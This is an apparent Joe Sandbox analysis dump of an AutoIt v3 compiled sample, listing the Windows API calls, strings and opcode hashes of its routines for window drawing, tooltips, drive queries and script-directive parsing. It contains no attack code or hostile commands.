                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: ac02b205b201b193d2cb04abf9f4f68c4efe65e7c74f93edb7cbc40b48ecca0b
                    • Instruction ID: c0f79c235270fd9ead0a3a7fa775377a2ed577f29e058691eb58fadf052d7dfb
                    • Opcode Fuzzy Hash: ac02b205b201b193d2cb04abf9f4f68c4efe65e7c74f93edb7cbc40b48ecca0b
                    • Instruction Fuzzy Hash: B2A0113000820CEBCA002B82EC08888BFACEA002A0B008020F80C808228B32A8208A88
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fafbd79944b334d98dc1f87b7b2f664b725811e57a63e989936b9e2ed833a716
                    • Instruction ID: 5aff76bd8b112ac4c20e176f9368dd071d5967854f7a076562f0e33191d4cc05
                    • Opcode Fuzzy Hash: fafbd79944b334d98dc1f87b7b2f664b725811e57a63e989936b9e2ed833a716
                    • Instruction Fuzzy Hash: 33221630905656CFDF288B28C4946BD77A7EB42304F68846BD8439BF92DB34DD82DB61
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: 790e307e4cd4757230deaac9a37a2eab12ecb7d6f250bd479a8eb44335191a48
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: F6C183322450A30ADB5D563DD4340BEBAE25EA37B131A175DE4B2CF6C5EF20ED64DA20
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 057768de2c57982ec9cc71141e09a689186bcc0a7d75f866567e8a8d6858d27e
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 69C1A4322451A30ADF6D563E843407EBBE25A937B131A075DE4B3DF6C5EF20ED249A20
                    APIs
                    • CharUpperBuffW.USER32(?,?,0070F910), ref: 007038AF
                    • IsWindowVisible.USER32(?), ref: 007038D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: d663e39bcbd998690d83d28323d1cd364b32fe104f9c90c7f5d4c38b2bdd0259
                    • Instruction ID: c836064678c9193869c913fcf442cd31bfd984ce54af8b41e416e0246b26cc77
                    • Opcode Fuzzy Hash: d663e39bcbd998690d83d28323d1cd364b32fe104f9c90c7f5d4c38b2bdd0259
                    • Instruction Fuzzy Hash: A8D18F70204205CBDB54FF10C491A6A77EAAF94344F14866DF8869B3E3CB39EE0ACB55
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 0070A89F
                    • GetSysColorBrush.USER32(0000000F), ref: 0070A8D0
                    • GetSysColor.USER32(0000000F), ref: 0070A8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 0070A8F6
                    • SelectObject.GDI32(?,?), ref: 0070A905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0070A930
                    • GetSysColor.USER32(00000010), ref: 0070A938
                    • CreateSolidBrush.GDI32(00000000), ref: 0070A93F
                    • FrameRect.USER32(?,?,00000000), ref: 0070A94E
                    • DeleteObject.GDI32(00000000), ref: 0070A955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0070A9A0
                    • FillRect.USER32(?,?,?), ref: 0070A9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 0070A9FD
                      • Part of subcall function 0070AB60: GetSysColor.USER32(00000012), ref: 0070AB99
                      • Part of subcall function 0070AB60: SetTextColor.GDI32(?,?), ref: 0070AB9D
                      • Part of subcall function 0070AB60: GetSysColorBrush.USER32(0000000F), ref: 0070ABB3
                      • Part of subcall function 0070AB60: GetSysColor.USER32(0000000F), ref: 0070ABBE
                      • Part of subcall function 0070AB60: GetSysColor.USER32(00000011), ref: 0070ABDB
                      • Part of subcall function 0070AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0070ABE9
                      • Part of subcall function 0070AB60: SelectObject.GDI32(?,00000000), ref: 0070ABFA
                      • Part of subcall function 0070AB60: SetBkColor.GDI32(?,00000000), ref: 0070AC03
                      • Part of subcall function 0070AB60: SelectObject.GDI32(?,?), ref: 0070AC10
                      • Part of subcall function 0070AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0070AC2F
                      • Part of subcall function 0070AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0070AC46
                      • Part of subcall function 0070AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0070AC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 617626b9db44557d77aac3cec92660d292b6188aa97150d1a65bf77446caebde
                    • Instruction ID: 88aa41e38b02365e7fbca3f2d905dd239c78006cdad69e0f37ffa503d2240430
                    • Opcode Fuzzy Hash: 617626b9db44557d77aac3cec92660d292b6188aa97150d1a65bf77446caebde
                    • Instruction Fuzzy Hash: 78A17C72108305FFD7219F64DC08A6B7BE9FB89321F108B29F962961E0DB79D844CB56
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00682CA2
                    • DeleteObject.GDI32(00000000), ref: 00682CE8
                    • DeleteObject.GDI32(00000000), ref: 00682CF3
                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00682CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00682D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 006BC68B
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006BC6C4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006BCAED
                      • Part of subcall function 00681B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00682036,?,00000000,?,?,?,?,006816CB,00000000,?), ref: 00681B9A
                    • SendMessageW.USER32(?,00001053), ref: 006BCB2A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006BCB41
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006BCB57
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006BCB62
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    • API String ID: 464785882-4108050209
                    • Opcode ID: c367e2e3cca650e67cb7e5d02a42f6de55363b956940c2707c02e72932bb047e
                    • Instruction ID: 14fddfe6b718c305bb2e5ee923102b169faca590f2027c57e48f0ba90b23331b
                    • Opcode Fuzzy Hash: c367e2e3cca650e67cb7e5d02a42f6de55363b956940c2707c02e72932bb047e
                    • Instruction Fuzzy Hash: 8912A170600202EFDB60DF24C894BE9BBE6BF45320F544679F596DB652CB31E982CB51
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 006F77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006F78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006F78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006F7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 006F7946
                    • GetClientRect.USER32(00000000,?), ref: 006F7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 006F7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006F79A5
                    • GetStockObject.GDI32(00000011), ref: 006F79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 006F79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006F79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006F79D2
                    • DeleteDC.GDI32(00000000), ref: 006F79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006F7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 006F7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 006F7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006F7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 006F7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 006F7AAE
                    • GetStockObject.GDI32(00000011), ref: 006F7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006F7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006F7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: 5020dce9c537dc5ccddd44b1a025e2a56c8ecd64a2ae3e7233f79f8349fe9195
                    • Instruction ID: 9f6a0984509cae481af3010a2ee8f750bcb2364947832978dfa39ee2bc46c45a
                    • Opcode Fuzzy Hash: 5020dce9c537dc5ccddd44b1a025e2a56c8ecd64a2ae3e7233f79f8349fe9195
                    • Instruction Fuzzy Hash: 14A17571A40209BFEB14DB64DC49FAE7BB9FB45710F048215FA15A72E0DBB4AD00CB64
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 006EAF89
                    • GetDriveTypeW.KERNEL32(?,0070FAC0,?,\\.\,0070F910), ref: 006EB066
                    • SetErrorMode.KERNEL32(00000000,0070FAC0,?,\\.\,0070F910), ref: 006EB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: 2221249403606f0ccc774a9a75de408d72d9190dbd3ecb9b85455d567595eb32
                    • Instruction ID: 0a723fe2b5e1475b7856fc3abf46edde05ce15bdf20aba3b8777da89aa0db5e2
                    • Opcode Fuzzy Hash: 2221249403606f0ccc774a9a75de408d72d9190dbd3ecb9b85455d567595eb32
                    • Instruction Fuzzy Hash: 3951E570682385FBCB10EB12C9D3CFE73B3AB14351B245119E446A7392CB79AD42CB46
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: 3c3750715ad639c7358be64f1c5cfb020074cd15bff87f85b25c122aedfd88ac
                    • Instruction ID: 49fdc1ae385e1375e51bf5fdfbdfdf1fea6739e0d4b989b754e0775bcb26f969
                    • Opcode Fuzzy Hash: 3c3750715ad639c7358be64f1c5cfb020074cd15bff87f85b25c122aedfd88ac
                    • Instruction Fuzzy Hash: C6812DF1600215BBCB64BB64CC83FEE776BAF11700F044129FA41AA2C2EB65DE92C755
                    APIs
                    • GetSysColor.USER32(00000012), ref: 0070AB99
                    • SetTextColor.GDI32(?,?), ref: 0070AB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 0070ABB3
                    • GetSysColor.USER32(0000000F), ref: 0070ABBE
                    • CreateSolidBrush.GDI32(?), ref: 0070ABC3
                    • GetSysColor.USER32(00000011), ref: 0070ABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0070ABE9
                    • SelectObject.GDI32(?,00000000), ref: 0070ABFA
                    • SetBkColor.GDI32(?,00000000), ref: 0070AC03
                    • SelectObject.GDI32(?,?), ref: 0070AC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0070AC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0070AC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0070AC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0070ACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0070ACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0070ACEC
                    • DrawFocusRect.USER32(?,?), ref: 0070ACF7
                    • GetSysColor.USER32(00000011), ref: 0070AD05
                    • SetTextColor.GDI32(?,00000000), ref: 0070AD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0070AD21
                    • SelectObject.GDI32(?,0070A869), ref: 0070AD38
                    • DeleteObject.GDI32(?), ref: 0070AD43
                    • SelectObject.GDI32(?,?), ref: 0070AD49
                    • DeleteObject.GDI32(?), ref: 0070AD4E
                    • SetTextColor.GDI32(?,?), ref: 0070AD54
                    • SetBkColor.GDI32(?,?), ref: 0070AD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 2e757ea97866c0baa938d2ed11d28eee53283d6be80af183d0f72459b2ae950e
                    • Instruction ID: 3440dcee8eab46a3cbad28c1e7666d6eec20909aa776824a216c5c877da43e32
                    • Opcode Fuzzy Hash: 2e757ea97866c0baa938d2ed11d28eee53283d6be80af183d0f72459b2ae950e
                    • Instruction Fuzzy Hash: EC612271900218FFDB119FA4DC48EAE7BB9EB08320F118225F915AB2E1DA799D50DB94
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00708D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00708D45
                    • CharNextW.USER32(0000014E), ref: 00708D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00708DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00708DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00708DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00708DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 00708E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00708E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00708E8C
                    • _memset.LIBCMT ref: 00708EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00708EFA
                    • _memset.LIBCMT ref: 00708F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00708F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00708FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00709088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007090AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007090F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00709121
                    • DrawMenuBar.USER32(?), ref: 00709130
                    • SetWindowTextW.USER32(?,0000014E), ref: 00709158
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 0268bb6e8d90cab644056e5b6cd27bb25170c637344e481afcd0f7f5649e1e74
                    • Instruction ID: 104af2ba79414afabc263fcac949635867ccf85293f3d3f76ee62b745272ea0e
                    • Opcode Fuzzy Hash: 0268bb6e8d90cab644056e5b6cd27bb25170c637344e481afcd0f7f5649e1e74
                    • Instruction Fuzzy Hash: DCE19170900219EADF60DF60CC84EEE7BB9EF05710F108359F9659A2D1DB788A81DF65
                    APIs
                    • GetCursorPos.USER32(?), ref: 00704C51
                    • GetDesktopWindow.USER32 ref: 00704C66
                    • GetWindowRect.USER32(00000000), ref: 00704C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 00704CCF
                    • DestroyWindow.USER32(?), ref: 00704CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00704D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00704D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00704D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00704D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00704D90
                    • IsWindowVisible.USER32(?), ref: 00704DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00704DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00704DDF
                    • GetWindowRect.USER32(?,?), ref: 00704DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00704E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00704E37
                    • CopyRect.USER32(?,?), ref: 00704E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00704EB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 1c36d9353bcba297e1f2d5601d6a364f4394379d8c5150d500c3068f50008b8c
                    • Instruction ID: 5b6b203eae41e386bbd16b9f0a8398739d9e2a49c38bce6d478b50fd146715d4
                    • Opcode Fuzzy Hash: 1c36d9353bcba297e1f2d5601d6a364f4394379d8c5150d500c3068f50008b8c
                    • Instruction Fuzzy Hash: D7B17BB1604340EFDB54DF64C844B6ABBE5BF84314F008A1CF6999B2A1DB75EC05CBA5
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006828BC
                    • GetSystemMetrics.USER32(00000007), ref: 006828C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006828EF
                    • GetSystemMetrics.USER32(00000008), ref: 006828F7
                    • GetSystemMetrics.USER32(00000004), ref: 0068291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00682939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00682949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0068297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00682990
                    • GetClientRect.USER32(00000000,000000FF), ref: 006829AE
                    • GetStockObject.GDI32(00000011), ref: 006829CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 006829D5
                      • Part of subcall function 00682344: GetCursorPos.USER32(?), ref: 00682357
                      • Part of subcall function 00682344: ScreenToClient.USER32(007467B0,?), ref: 00682374
                      • Part of subcall function 00682344: GetAsyncKeyState.USER32(00000001), ref: 00682399
                      • Part of subcall function 00682344: GetAsyncKeyState.USER32(00000002), ref: 006823A7
                    • SetTimer.USER32(00000000,00000000,00000028,00681256), ref: 006829FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
